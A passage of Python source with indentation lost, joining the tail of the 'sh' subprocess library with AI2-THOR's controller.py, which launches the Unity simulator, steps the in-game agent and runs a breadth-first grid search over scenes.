module = fetch_module_from_frame(mod_fullname, parent_frame)
if not module:
return None
# make sure it's a class we're allowed to import from
if module.__class__.__name__ not in self.restrict_to:
return None
return self
def load_module(self, mod_fullname):
parent_frame = inspect.currentframe().f_back
while in_importlib(parent_frame):
parent_frame = parent_frame.f_back
module = fetch_module_from_frame(mod_fullname, parent_frame)
# we HAVE to include the module in sys.modules, per the import PEP.
# older versions of python were more lenient about this being set, but
# not in >= python3.3, unfortunately. this requirement necessitates the
# ugly code in SelfWrapper.__call__
sys.modules[mod_fullname] = module
module.__loader__ = self
return module
def run_tests(env, locale, args, version, force_select, **extra_env): # pragma: no cover
py_version = "python"
py_version += str(version)
py_bin = which(py_version)
return_code = None
poller = "poll"
if force_select:
poller = "select"
if py_bin:
print("Testing %s, locale %r, poller: %s" % (py_version.capitalize(),
locale, poller))
env["SH_TESTS_USE_SELECT"] = str(int(force_select))
env["LANG"] = locale
for k,v in extra_env.items():
env[k] = str(v)
cmd = [py_bin, "-W", "ignore", os.path.join(THIS_DIR, "test.py")] + args[1:]
print("Running %r" % cmd)
launch = lambda: os.spawnve(os.P_WAIT, cmd[0], cmd, env)
return_code = launch()
return return_code
# we're being run as a stand-alone script
if __name__ == "__main__": # pragma: no cover
def parse_args():
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-e", "--envs", dest="envs", action="append")
parser.add_option("-l", "--locales", dest="constrain_locales", action="append")
options, args = parser.parse_args()
envs = options.envs or []
constrain_locales = options.constrain_locales or []
return args, envs, constrain_locales
# these are essentially restrictions on what envs/constrain_locales to restrict to for
# the tests. if they're empty lists, it means use all available
args, constrain_versions, constrain_locales = parse_args()
action = None
if args:
action = args[0]
if action in ("test", "travis", "tox"):
import test
coverage = None
if test.HAS_UNICODE_LITERAL:
import coverage
env = os.environ.copy()
env["SH_TESTS_RUNNING"] = "1"
if coverage:
test.append_module_path(env, coverage)
# if we're testing locally, run all versions of python on the system
if action == "test":
all_versions = ("2.6", "2.7", "3.1", "3.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.8")
# if we're testing on travis or tox, just use the system's default python, since travis will spawn a vm per
# python version in our .travis.yml file, and tox will run its matrix via tox.ini
elif action in ("travis", "tox"):
v = sys.version_info
sys_ver = "%d.%d" % (v[0], v[1])
all_versions = (sys_ver,)
all_force_select = [True]
if HAS_POLL:
all_force_select.append(False)
all_locales = ("en_US.UTF-8", "C")
i = 0
ran_versions = set()
for locale in all_locales:
# make sure this locale is allowed
if constrain_locales and locale not in constrain_locales:
continue
for version in all_versions:
# make sure this version is allowed
if constrain_versions and version not in constrain_versions:
continue
for force_select in all_force_select:
env_copy = env.copy()
ran_versions.add(version)
exit_code = run_tests(env_copy, locale, args, version,
force_select, SH_TEST_RUN_IDX=i)
if exit_code is None:
print("Couldn't find %s, skipping" % version)
elif exit_code != 0:
print("Failed for %s, %s" % (version, locale))
exit(1)
i += 1
print("Tested Python versions: %s" % ",".join(sorted(list(ran_versions))))
else:
env = Environment(globals())
run_repl(env)
# we're being imported from somewhere
else:
self = sys.modules[__name__]
sys.modules[__name__] = SelfWrapper(self)
register_importer()
|
controller.py
|
# Copyright Allen Institute for Artificial Intelligence 2017
"""
ai2thor.controller
Primary entrypoint into the Thor API. Provides all the high-level functions
needed to control the in-game agent through ai2thor.server.
"""
import atexit
from collections import deque, defaultdict
from itertools import product
import io
import json
import copy
import logging
import fcntl
import math
import time
import random
import shlex
import signal
import subprocess
import shutil
import threading
import os
import platform
import uuid
import tty
import sys
import termios
try:
from queue import Queue
except ImportError:
from Queue import Queue
import zipfile
import numpy as np
import ai2thor.docker
import ai2thor.downloader
import ai2thor.server
from ai2thor.server import queue_get
from ai2thor._builds import BUILDS
from ai2thor._quality_settings import QUALITY_SETTINGS, DEFAULT_QUALITY
logger = logging.getLogger(__name__)
RECEPTACLE_OBJECTS = {
'Box': {'Candle',
'CellPhone',
'Cloth',
'CreditCard',
'Dirt',
'KeyChain',
'Newspaper',
'ScrubBrush',
'SoapBar',
'SoapBottle',
'ToiletPaper'},
'Cabinet': {'Bowl',
'BowlDirty',
'Box',
'Bread',
'BreadSliced',
'ButterKnife',
'Candle',
'CellPhone',
'Cloth',
'CoffeeMachine',
'Container',
'ContainerFull',
'CreditCard',
'Cup',
'Fork',
'KeyChain',
'Knife',
'Laptop',
'Mug',
'Newspaper',
'Pan',
'Plate',
'Plunger',
'Pot',
'Potato',
'Sandwich',
'ScrubBrush',
'SoapBar',
'SoapBottle',
'Spoon',
'SprayBottle',
'Statue',
'TissueBox',
'Toaster',
'ToiletPaper',
'WateringCan'},
'CoffeeMachine': {'MugFilled', 'Mug'},
'CounterTop': {'Apple',
'AppleSlice',
'Bowl',
'BowlDirty',
'BowlFilled',
'Box',
'Bread',
'BreadSliced',
'ButterKnife',
'Candle',
'CellPhone',
'CoffeeMachine',
'Container',
'ContainerFull',
'CreditCard',
'Cup',
'Egg',
'EggFried',
'EggShell',
'Fork',
'HousePlant',
'KeyChain',
'Knife',
'Laptop',
'Lettuce',
'LettuceSliced',
'Microwave',
'Mug',
'MugFilled',
'Newspaper',
'Omelette',
'Pan',
'Plate',
'Plunger',
'Pot',
'Potato',
'PotatoSliced',
'RemoteControl',
'Sandwich',
'ScrubBrush',
'SoapBar',
'SoapBottle',
'Spoon',
'SprayBottle',
'Statue',
'Television',
'TissueBox',
'Toaster',
'ToiletPaper',
'Tomato',
'TomatoSliced',
'WateringCan'},
'Fridge': {'Apple',
'AppleSlice',
'Bowl',
'BowlDirty',
'BowlFilled',
'Bread',
'BreadSliced',
'Container',
'ContainerFull',
'Cup',
'Egg',
'EggFried',
'EggShell',
'Lettuce',
'LettuceSliced',
'Mug',
'MugFilled',
'Omelette',
'Pan',
'Plate',
'Pot',
'Potato',
'PotatoSliced',
'Sandwich',
'Tomato',
'TomatoSliced'},
'GarbageCan': {'Apple',
'AppleSlice',
'Box',
'Bread',
'BreadSliced',
'Candle',
'CellPhone',
'CreditCard',
'Egg',
'EggFried',
'EggShell',
'LettuceSliced',
'Newspaper',
'Omelette',
'Plunger',
'Potato',
'PotatoSliced',
'Sandwich',
'ScrubBrush',
'SoapBar',
'SoapBottle',
'SprayBottle',
'Statue',
'ToiletPaper',
'Tomato',
'TomatoSliced'},
'Microwave': {'Bowl',
'BowlDirty',
'BowlFilled',
'Bread',
'BreadSliced',
'Container',
'ContainerFull',
'Cup',
'Egg',
'EggFried',
'Mug',
'MugFilled',
'Omelette',
'Plate',
'Potato',
'PotatoSliced',
'Sandwich'},
'PaintingHanger': {'Painting'},
'Pan': {'Apple',
'AppleSlice',
'EggFried',
'Lettuce',
'LettuceSliced',
'Omelette',
'Potato',
'PotatoSliced',
'Tomato',
'TomatoSliced'},
'Pot': {'Apple',
'AppleSlice',
'EggFried',
'Lettuce',
'LettuceSliced',
'Omelette',
'Potato',
'PotatoSliced',
'Tomato',
'TomatoSliced'},
'Sink': {'Apple',
'AppleSlice',
'Bowl',
'BowlDirty',
'BowlFilled',
'ButterKnife',
'Container',
'ContainerFull',
'Cup',
'Egg',
'EggFried',
'EggShell',
'Fork',
'Knife',
'Lettuce',
'LettuceSliced',
'Mug',
'MugFilled',
'Omelette',
'Pan',
'Plate',
'Pot',
'Potato',
'PotatoSliced',
'Sandwich',
'ScrubBrush',
'SoapBottle',
'Spoon',
'Tomato',
'TomatoSliced',
'WateringCan'},
'StoveBurner': {'Omelette', 'Pot', 'Pan', 'EggFried'},
'TableTop': {'Apple',
'AppleSlice',
'Bowl',
'BowlDirty',
'BowlFilled',
'Box',
'Bread',
'BreadSliced',
'ButterKnife',
'Candle',
'CellPhone',
'CoffeeMachine',
'Container',
'ContainerFull',
'CreditCard',
'Cup',
'Egg',
'EggFried',
'EggShell',
'Fork',
'HousePlant',
'KeyChain',
'Knife',
'Laptop',
'Lettuce',
'LettuceSliced',
'Microwave',
'Mug',
'MugFilled',
'Newspaper',
'Omelette',
'Pan',
'Plate',
'Plunger',
'Pot',
'Potato',
'PotatoSliced',
'RemoteControl',
'Sandwich',
'ScrubBrush',
'SoapBar',
'SoapBottle',
'Spoon',
'SprayBottle',
'Statue',
'Television',
'TissueBox',
'Toaster',
'ToiletPaper',
'Tomato',
'TomatoSliced',
'WateringCan'},
'ToiletPaperHanger': {'ToiletPaper'},
'TowelHolder': {'Cloth'}}
def get_term_character():
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
def process_alive(pid):
"""
Use kill(0) to determine if pid is alive
:param pid: process id
:rtype: bool
"""
try:
os.kill(pid, 0)
except OSError:
return False
return True
# python2.7 compatible makedirs
def makedirs(directory):
if not os.path.isdir(directory):
os.makedirs(directory)
def distance(point1, point2):
x_diff = (point1['x'] - point2['x']) ** 2
z_diff = (point1['z'] - point2['z']) ** 2
return math.sqrt(x_diff + z_diff)
def key_for_point(x, z):
return "%0.1f %0.1f" % (x, z)
class Controller(object):
def __init__(self, quality=DEFAULT_QUALITY, fullscreen=False):
self.request_queue = Queue(maxsize=1)
self.response_queue = Queue(maxsize=1)
self.receptacle_nearest_pivot_points = {}
self.server = None
self.unity_pid = None
self.docker_enabled = False
self.container_id = None
self.local_executable_path = None
self.last_event = None
self.server_thread = None
self.killing_unity = False
self.quality = quality
self.lock_file = None
self.fullscreen = fullscreen
def reset(self, scene_name=None):
self.response_queue.put_nowait(dict(action='Reset', sceneName=scene_name, sequenceId=0))
self.last_event = queue_get(self.request_queue)
return self.last_event
def random_initialize(
self,
random_seed=None,
randomize_open=False,
unique_object_types=False,
exclude_receptacle_object_pairs=[],
max_num_repeats=1,
remove_prob=0.5):
receptacle_objects = []
for rec_obj_type, object_types in RECEPTACLE_OBJECTS.items():
receptacle_objects.append(
dict(receptacleObjectType=rec_obj_type, itemObjectTypes=list(object_types))
)
if random_seed is None:
random_seed = random.randint(0, 2**32)
exclude_object_ids = []
for obj in self.last_event.metadata['objects']:
pivot_points = self.receptacle_nearest_pivot_points
# don't put things in pot or pan currently
if (pivot_points and obj['receptacle'] and
pivot_points[obj['objectId']].keys()) or obj['objectType'] in ['Pot', 'Pan']:
#print("no visible pivots for receptacle %s" % o['objectId'])
exclude_object_ids.append(obj['objectId'])
return self.step(dict(
action='RandomInitialize',
receptacleObjects=receptacle_objects,
randomizeOpen=randomize_open,
uniquePickupableObjectTypes=unique_object_types,
excludeObjectIds=exclude_object_ids,
excludeReceptacleObjectPairs=exclude_receptacle_object_pairs,
maxNumRepeats=max_num_repeats,
removeProb=remove_prob,
randomSeed=random_seed))
def scene_names(self):
scenes = []
for low, high in [(1,31), (201, 231), (301, 331), (401, 431)]:
for i in range(low, high):
scenes.append('FloorPlan%s' % i)
return scenes
def unlock_release(self):
if self.lock_file:
fcntl.flock(self.lock_file, fcntl.LOCK_UN)
def lock_release(self):
build_dir = os.path.join(self.releases_dir(), self.build_name())
if os.path.isdir(build_dir):
self.lock_file = open(os.path.join(build_dir, ".lock"), "w")
fcntl.flock(self.lock_file, fcntl.LOCK_SH)
def prune_releases(self):
current_exec_path = self.executable_path()
for d in os.listdir(self.releases_dir()):
release = os.path.join(self.releases_dir(), d)
if current_exec_path.startswith(release):
continue
if os.path.isdir(release):
try:
with open(os.path.join(release, ".lock"), "w") as f:
fcntl.flock(f, fcntl.LOCK_EX | fcntl.LOCK_NB)
shutil.rmtree(release)
except Exception as e:
pass
def next_interact_command(self):
current_buffer = ''
while True:
commands = self._interact_commands
current_buffer += get_term_character()
if current_buffer == 'q' or current_buffer == '\x03':
break
if current_buffer in commands:
yield commands[current_buffer]
current_buffer = ''
else:
match = False
for k,v in commands.items():
if k.startswith(current_buffer):
match = True
break
if not match:
current_buffer = ''
def interact(self):
default_interact_commands = {
'\x1b[C': dict(action='MoveRight', moveMagnitude=0.25),
'\x1b[D': dict(action='MoveLeft', moveMagnitude=0.25),
'\x1b[A': dict(action='MoveAhead', moveMagnitude=0.25),
'\x1b[B': dict(action='MoveBack', moveMagnitude=0.25),
'\x1b[1;2A': dict(action='LookUp'),
'\x1b[1;2B': dict(action='LookDown'),
'\x1b[1;2C': dict(action='RotateRight'),
'\x1b[1;2D': dict(action='RotateLeft')
}
self._interact_commands = default_interact_commands.copy()
command_message = u"Enter a Command: Move \u2190\u2191\u2192\u2193, Rotate/Look Shift + \u2190\u2191\u2192\u2193, Quit 'q' or Ctrl-C"
print(command_message)
for a in self.next_interact_command():
new_commands = {}
command_counter = dict(counter=1)
def add_command(cc, action, **args):
if cc['counter'] < 10:
com = dict(action=action)
com.update(args)
new_commands[str(cc['counter'])] = com
cc['counter'] += 1
event = self.step(a)
# check inventory
visible_objects = []
for o in event.metadata['objects']:
if o['visible']:
visible_objects.append(o['objectId'])
if o['openable']:
if o['isopen']:
add_command(command_counter, 'CloseObject', objectId=o['objectId'])
else:
add_command(command_counter, 'OpenObject', objectId=o['objectId'])
if len(event.metadata['inventoryObjects']) > 0:
if o['receptacle'] and (not o['openable'] or o['isopen']):
inventoryObjectId = event.metadata['inventoryObjects'][0]['objectId']
add_command(command_counter, 'PutObject', objectId=inventoryObjectId, receptacleObjectId=o['objectId'])
elif o['pickupable']:
add_command(command_counter, 'PickupObject', objectId=o['objectId'])
self._interact_commands = default_interact_commands.copy()
self._interact_commands.update(new_commands)
print(command_message)
print("Visible Objects:\n" + "\n".join(sorted(visible_objects)))
skip_keys = ['action', 'objectId']
for k in sorted(new_commands.keys()):
v = new_commands[k]
command_info = [k + ")", v['action']]
if 'objectId' in v:
command_info.append(v['objectId'])
for a, av in v.items():
if a in skip_keys:
continue
command_info.append("%s: %s" % (a, av))
print(' '.join(command_info))
def step(self, action, raise_for_failure=False):
# prevent changes to the action from leaking
action = copy.deepcopy(action)
# XXX should be able to get rid of this with some sort of deprecation warning
if 'AI2THOR_VISIBILITY_DISTANCE' in os.environ:
action['visibilityDistance'] = float(os.environ['AI2THOR_VISIBILITY_DISTANCE'])
should_fail = False
self.last_action = action
if ('objectId' in action and (action['action'] == 'OpenObject' or action['action'] == 'CloseObject')):
force_visible = action.get('forceVisible', False)
if not force_visible and self.last_event.instance_detections2D and action['objectId'] not in self.last_event.instance_detections2D:
should_fail = True
obj_metadata = self.last_event.get_object(action['objectId'])
if obj_metadata is None or obj_metadata['isopen'] == (action['action'] == 'OpenObject'):
should_fail = True
elif action['action'] == 'PutObject':
receptacle_type = action['receptacleObjectId'].split('|')[0]
object_type = action['objectId'].split('|')[0]
if object_type not in RECEPTACLE_OBJECTS[receptacle_type]:
should_fail = True
rotation = action.get('rotation')
if rotation is not None and type(rotation) != dict:
action['rotation'] = {}
action['rotation']['y'] = rotation
if should_fail:
new_event = copy.deepcopy(self.last_event)
new_event.metadata['lastActionSuccess'] = False
self.last_event = new_event
return new_event
assert self.request_queue.empty()
self.response_queue.put_nowait(action)
self.last_event = queue_get(self.request_queue)
if not self.last_event.metadata['lastActionSuccess'] and self.last_event.metadata['errorCode'] == 'InvalidAction':
raise ValueError(self.last_event.metadata['errorMessage'])
if raise_for_failure:
assert self.last_event.metadata['lastActionSuccess']
return self.last_event
def unity_command(self, width, height):
command = self.executable_path()
fullscreen = 1 if self.fullscreen else 0
command += " -screen-fullscreen %s -screen-quality %s -screen-width %s -screen-height %s" % (fullscreen, QUALITY_SETTINGS[self.quality], width, height)
return shlex.split(command)
def _start_unity_thread(self, env, width, height, host, port, image_name):
# get environment variables
env['AI2THOR_CLIENT_TOKEN'] = self.server.client_token = str(uuid.uuid4())
env['AI2THOR_HOST'] = host
env['AI2THOR_PORT'] = str(port)
# env['AI2THOR_SERVER_SIDE_SCREENSHOT'] = 'True'
# print("Viewer: http://%s:%s/viewer" % (host, port))
command = self.unity_command(width, height)
if image_name is not None:
self.container_id = ai2thor.docker.run(image_name, self.base_dir(), ' '.join(command), env)
atexit.register(lambda: ai2thor.docker.kill_container(self.container_id))
else:
proc = subprocess.Popen(command, env=env)
self.unity_pid = proc.pid
atexit.register(lambda: proc.poll() is None and proc.kill())
returncode = proc.wait()
if returncode != 0 and not self.killing_unity:
raise Exception("command: %s exited with %s" % (command, returncode))
def check_docker(self):
if self.docker_enabled:
assert ai2thor.docker.has_docker(), "Docker enabled, but could not find docker binary in path"
assert ai2thor.docker.nvidia_version() is not None,\
"No nvidia driver version found at /proc/driver/nvidia/version - Dockerized THOR is only \
compatible with hosts with Nvidia cards with a driver installed"
def check_x_display(self, x_display):
with open(os.devnull, "w") as dn:
# copying the environment so that we pickup
# XAUTHORITY values
env = os.environ.copy()
env['DISPLAY'] = x_display
if subprocess.call(['which', 'xdpyinfo'], stdout=dn) == 0:
assert subprocess.call("xdpyinfo", stdout=dn, env=env, shell=True) == 0, \
("Invalid DISPLAY %s - cannot find X server with xdpyinfo" % x_display)
def _start_server_thread(self):
self.server.start()
def releases_dir(self):
return os.path.join(self.base_dir(), 'releases')
def base_dir(self):
return os.path.join(os.path.expanduser('~'), '.ai2thor')
def build_name(self):
return os.path.splitext(os.path.basename(BUILDS[platform.system()]['url']))[0]
def executable_path(self):
if self.local_executable_path is not None:
return self.local_executable_path
target_arch = platform.system()
if target_arch == 'Linux':
return os.path.join(self.releases_dir(), self.build_name(), self.build_name())
elif target_arch == 'Darwin':
return os.path.join(
self.releases_dir(),
self.build_name(),
self.build_name() + ".app",
"Contents/MacOS",
self.build_name())
else:
raise Exception('unable to handle target arch %s' % target_arch)
def download_binary(self):
if platform.architecture()[0] != '64bit':
raise Exception("Only 64bit currently supported")
url = BUILDS[platform.system()]['url']
tmp_dir = os.path.join(self.base_dir(), 'tmp')
makedirs(self.releases_dir())
makedirs(tmp_dir)
if not os.path.isfile(self.executable_path()):
zip_data = ai2thor.downloader.download(
url,
self.build_name(),
BUILDS[platform.system()]['sha256'])
z = zipfile.ZipFile(io.BytesIO(zip_data))
# use tmpdir instead or a random number
extract_dir = os.path.join(tmp_dir, self.build_name())
logger.debug("Extracting zipfile %s" % os.path.basename(url))
z.extractall(extract_dir)
os.rename(extract_dir, os.path.join(self.releases_dir(), self.build_name()))
# we can lose the executable permission when unzipping a build
os.chmod(self.executable_path(), 0o755)
else:
logger.debug("%s exists - skipping download" % self.executable_path())
def start(
self,
port=0,
start_unity=True,
player_screen_width=300,
player_screen_height=300,
x_display=None):
if 'AI2THOR_VISIBILITY_DISTANCE' in os.environ:
import warnings
warnings.warn("AI2THOR_VISIBILITY_DISTANCE environment variable is deprecated, use \
the parameter visibilityDistance parameter with the Initialize action instead")
if player_screen_height < 300 or player_screen_width < 300:
raise Exception("Screen resolution must be >= 300x300")
if self.server_thread is not None:
raise Exception("server has already been started - cannot start more than once")
env = os.environ.copy()
image_name = None
host = '127.0.0.1'
if self.docker_enabled:
self.check_docker()
host = ai2thor.docker.bridge_gateway()
self.server = ai2thor.server.Server(
self.request_queue,
self.response_queue,
host,
port=port)
_, port = self.server.wsgi_server.socket.getsockname()
self.server_thread = threading.Thread(target=self._start_server_thread)
self.server_thread.daemon = True
self.server_thread.start()
if start_unity:
if platform.system() == 'Linux':
if self.docker_enabled:
image_name = ai2thor.docker.build_image()
else:
if x_display:
env['DISPLAY'] = ':' + x_display
elif 'DISPLAY' not in env:
env['DISPLAY'] = ':0.0'
self.check_x_display(env['DISPLAY'])
self.download_binary()
self.lock_release()
self.prune_releases()
unity_thread = threading.Thread(
target=self._start_unity_thread,
args=(env, player_screen_width, player_screen_height, host, port, image_name))
unity_thread.daemon = True
unity_thread.start()
# receive the first request
self.last_event = queue_get(self.request_queue)
return self.last_event
def stop(self):
self.response_queue.put_nowait({})
self.server.wsgi_server.shutdown()
self.stop_container()
self.stop_unity()
self.unlock_release()
def stop_container(self):
if self.container_id:
ai2thor.docker.kill_container(self.container_id)
self.container_id = None
def stop_unity(self):
if self.unity_pid and process_alive(self.unity_pid):
self.killing_unity = True
os.kill(self.unity_pid, signal.SIGTERM)
for i in range(10):
if not process_alive(self.unity_pid):
break
time.sleep(0.1)
if process_alive(self.unity_pid):
os.kill(self.unity_pid, signal.SIGKILL)
class BFSSearchPoint:
def __init__(self, start_position, move_vector, heading_angle=0.0, horizon_angle=0.0):
self.start_position = start_position
self.move_vector = defaultdict(lambda: 0.0)
self.move_vector.update(move_vector)
self.heading_angle = heading_angle
self.horizon_angle = horizon_angle
def target_point(self):
x = self.start_position['x'] + self.move_vector['x']
z = self.start_position['z'] + self.move_vector['z']
return dict(x=x, z=z)
class BFSController(Controller):
def __init__(self, grid_size=0.25):
super(BFSController, self).__init__()
self.rotations = [0, 90, 180, 270]
self.horizons = [330, 0, 30]
self.allow_enqueue = True
self.queue = deque()
self.seen_points = []
self.visited_seen_points = []
self.grid_points = []
self.grid_size = grid_size
self._check_visited = False
self.distance_threshold = self.grid_size / 5.0
def visualize_points(self, scene_name, wait_key=10):
import cv2
points = set()
xs = []
zs = []
# Follow the file as it grows
for point in self.grid_points:
xs.append(point['x'])
zs.append(point['z'])
points.add(str(point['x']) + "," + str(point['z']))
image_width = 470
image_height = 530
image = np.zeros((image_height, image_width, 3), np.uint8)
if not xs:
return
min_x = min(xs) - 1
max_x = max(xs) + 1
min_z = min(zs) - 1
max_z = max(zs) + 1
for point in list(points):
x, z = map(float, point.split(','))
circle_x = round(((x - min_x) / float(max_x - min_x)) * image_width)
z = (max_z - z) + min_z
circle_y = round(((z - min_z) / float(max_z - min_z)) * image_height)
cv2.circle(image, (circle_x, circle_y), 5, (0, 255, 0), -1)
cv2.imshow(scene_name, image)
cv2.waitKey(wait_key)
def has_islands(self):
queue = []
seen_points = set()
mag = self.grid_size
def enqueue_island_points(p):
if json.dumps(p) in seen_points:
return
queue.append(dict(z=p['z'] + mag, x=p['x']))
queue.append(dict(z=p['z'] - mag, x=p['x']))
queue.append(dict(z=p['z'], x=p['x'] + mag))
queue.append(dict(z=p['z'], x=p['x'] - mag))
seen_points.add(json.dumps(p))
enqueue_island_points(self.grid_points[0])
while queue:
point_to_find = queue.pop()
for p in self.grid_points:
dist = math.sqrt(
((point_to_find['x'] - p['x']) ** 2) +
((point_to_find['z'] - p['z']) ** 2))
if dist < 0.05:
enqueue_island_points(p)
return len(seen_points) != len(self.grid_points)
def build_graph(self):
import networkx as nx
graph = nx.Graph()
for point in self.grid_points:
self._build_graph_point(graph, point)
return graph
def key_for_point(self, point):
return "{x:0.3f}|{z:0.3f}".format(**point)
def _build_graph_point(self, graph, point):
for p in self.grid_points:
dist = math.sqrt(((point['x'] - p['x']) ** 2) + ((point['z'] - p['z']) ** 2))
if dist <= (self.grid_size + 0.01) and dist > 0:
graph.add_edge(self.key_for_point(point), self.key_for_point(p))
def move_relative_points(self, all_points, graph, position, rotation):
action_orientation = {
0:dict(x=0, z=1, action='MoveAhead'),
90:dict(x=1, z=0, action='MoveRight'),
180:dict(x=0, z=-1, action='MoveBack'),
270:dict(x=-1, z=0, action='MoveLeft')
}
move_points = dict()
for n in graph.neighbors(self.key_for_point(position)):
point = all_points[n]
x_o = round((point['x'] - position['x']) / self.grid_size)
z_o = round((point['z'] - position['z']) / self.grid_size)
for target_rotation, offsets in action_orientation.items():
delta = round(rotation + target_rotation) % 360
ao = action_orientation[delta]
action_name = action_orientation[target_rotation]['action']
if x_o == ao['x'] and z_o == ao['z']:
move_points[action_name] = point
break
return move_points
def plan_horizons(self, agent_horizon, target_horizon):
actions = []
horizon_step_map = {330:3, 0:2, 30:1, 60:0}
look_diff = horizon_step_map[int(agent_horizon)] - horizon_step_map[int(target_horizon)]
if look_diff > 0:
for i in range(look_diff):
actions.append(dict(action='LookDown'))
else:
for i in range(abs(look_diff)):
actions.append(dict(action='LookUp'))
return actions
def plan_rotations(self, agent_rotation, target_rotation):
right_diff = target_rotation - agent_rotation
if right_diff < 0:
right_diff += 360
right_steps = right_diff / 90
left_diff = agent_rotation - target_rotation
if left_diff < 0:
left_diff += 360
left_steps = left_diff / 90
actions = []
if right_steps < left_steps:
for i in range(int(right_steps)):
actions.append(dict(action='RotateRight'))
else:
for i in range(int(left_steps)):
actions.append(dict(action='RotateLeft'))
return actions
def shortest_plan(self, graph, agent, target):
import networkx as nx
path = nx.shortest_path(graph, self.key_for_point(agent['position']), self.key_for_point(target['position']))
actions = []
all_points = {}
for point in self.grid_points:
all_points[self.key_for_point(point)] = point
#assert all_points[path[0]] == agent['position']
current_position = agent['position']
current_rotation = agent['rotation']['y']
for p in path[1:]:
inv_pms = {self.key_for_point(v): k for k, v in self.move_relative_points(all_points, graph, current_position, current_rotation).items()}
actions.append(dict(action=inv_pms[p]))
current_position = all_points[p]
actions += self.plan_horizons(agent['cameraHorizon'], target['cameraHorizon'])
actions += self.plan_rotations(agent['rotation']['y'], target['rotation']['y'])
# self.visualize_points(path)
return actions
def enqueue_point(self, point):
# ensure there are no points near the new point
if self._check_visited or not any(map(lambda p: distance(p, point.target_point()) < self.distance_threshold, self.seen_points)):
self.seen_points.append(point.target_point())
self.queue.append(point)
def enqueue_points(self, agent_position):
if not self.allow_enqueue:
return
if not self._check_visited or not any(map(lambda p: distance(p, agent_position) < self.distance_threshold, self.visited_seen_points)):
self.enqueue_point(BFSSearchPoint(agent_position, dict(x=-1 * self.grid_size)))
self.enqueue_point(BFSSearchPoint(agent_position, dict(x=self.grid_size)))
self.enqueue_point(BFSSearchPoint(agent_position, dict(z=-1 * self.grid_size)))
self.enqueue_point(BFSSearchPoint(agent_position, dict(z=1 * self.grid_size)))
self.visited_seen_points.append(agent_position)
def search_all_closed(self, scene_name):
self.allow_enqueue = True
self.queue = deque()
self.seen_points = []
self.visited_seen_points = []
self.grid_points = []
event = self.reset(scene_name)
event = self.step(dict(action='Initialize', gridSize=self.grid_size))
self.enqueue_points(event.metadata['agent']['position'])
while self.queue:
self.queue_step()
# self.visualize_points(scene_name)
def start_search(
self,
scene_name,
random_seed,
full_grid,
current_receptacle_object_pairs,
randomize=True):
self.seen_points = []
self.visited_seen_points = []
self.queue = deque()
self.grid_points = []
# we only search a pre-defined grid with all the cabinets/fridges closed
# then keep the points that can still be reached
self.allow_enqueue = True
for gp in full_grid:
self.enqueue_points(gp)
self.allow_enqueue = False
self.reset(scene_name)
receptacle_object_pairs = []
for op in current_receptacle_object_pairs:
object_id, receptacle_object_id = op.split('||')
receptacle_object_pairs.append(
dict(receptacleObjectId=receptacle_object_id,
objectId=object_id))
if randomize:
self.random_initialize(
random_seed=random_seed,
unique_object_types=True,
exclude_receptacle_object_pairs=receptacle_object_pairs)
# there is some randomization in initialize scene
# and if a seed is passed in this will keep it
# deterministic
if random_seed is not None:
random.seed(random_seed)
self.initialize_scene()
while self.queue:
self.queue_step()
#self.visualize_points(scene_name)
self.prune_points()
#self.visualize_points(scene_name)
# get rid of unreachable points
def prune_points(self):
final_grid_points = set()
for gp in self.grid_points:
final_grid_points.add(key_for_point(gp['x'], gp['z']))
pruned_grid_points = []
for gp in self.grid_points:
found = False
for x in [1, -1]:
found |= key_for_point(gp['x'] + (self.grid_size * x), gp['z']) in final_grid_points
for z in [1, -1]:
found |= key_for_point(
gp['x'],
(self.grid_size * z) + gp['z']) in final_grid_points
if found:
pruned_grid_points.append(gp)
self.grid_points = pruned_grid_points
def is_object_visible(self, object_id):
for obj in self.last_event.metadata['objects']:
if obj['objectId'] == object_id and obj['visible']:
return True
return False
def find_visible_receptacles(self):
receptacle_points = []
receptacle_pivot_points = []
# pickup all objects
visibility_object_id = None
visibility_object_types = ['Mug', 'CellPhone']
for obj in self.last_event.metadata['objects']:
if obj['pickupable']:
self.step(action=dict(
action='PickupObject',
objectId=obj['objectId'],
forceVisible=True))
if visibility_object_id is None and obj['objectType'] in visibility_object_types:
visibility_object_id = obj['objectId']
for point in self.grid_points:
self.step(dict(
action='Teleport',
x=point['x'],
y=point['y'],
z=point['z']), raise_for_failure=True)
for rot, hor in product(self.rotations, self.horizons):
event = self.step(
dict(action='RotateLook', rotation=rot, horizon=hor),
raise_for_failure=True)
for j in event.metadata['objects']:
if j['receptacle'] and j['visible']:
receptacle_points.append(dict(
distance=j['distance'],
pivotId=0,
receptacleObjectId=j['objectId'],
searchNode=dict(
horizon=hor,
rotation=rot,
openReceptacle=False,
pivotId=0,
receptacleObjectId='',
x=point['x'],
y=point['y'],
z=point['z'])))
if j['openable']:
self.step(action=dict(
action='OpenObject',
forceVisible=True,
objectId=j['objectId']),
raise_for_failure=True)
for pivot_id in range(j['receptacleCount']):
self.step(
action=dict(
action='Replace',
forceVisible=True,
receptacleObjectId=j['objectId'],
objectId=visibility_object_id,
pivot=pivot_id), raise_for_failure=True)
if self.is_object_visible(visibility_object_id):
receptacle_pivot_points.append(dict(
distance=j['distance'],
pivotId=pivot_id,
receptacleObjectId=j['objectId'],
searchNode=dict(
horizon=hor,
rotation=rot,
openReceptacle=j['openable'],
pivotId=pivot_id,
receptacleObjectId=j['objectId'],
x=point['x'],
y=point['y'],
z=point['z'])))
if j['openable']:
self.step(action=dict(
action='CloseObject',
forceVisible=True,
objectId=j['objectId']),
raise_for_failure=True)
return receptacle_pivot_points, receptacle_points
def find_visible_objects(self):
seen_target_objects = defaultdict(list)
for point in self.grid_points:
self.step(dict(
action='Teleport',
x=point['x'],
y=point['y'],
z=point['z']), raise_for_failure=True)
for rot, hor in product(self.rotations, self.horizons):
event = self.step(dict(
action='RotateLook',
rotation=rot,
horizon=hor), raise_for_failure=True)
object_receptacle = dict()
for obj in event.metadata['objects']:
if obj['receptacle']:
for pso in obj['pivotSimObjs']:
object_receptacle[pso['objectId']] = obj
for obj in filter(
lambda x: x['visible'] and x['pickupable'],
event.metadata['objects']):
#if obj['objectId'] in object_receptacle and\
# object_receptacle[obj['objectId']]['openable'] and not \
# object_receptacle[obj['objectId']]['isopen']:
# continue
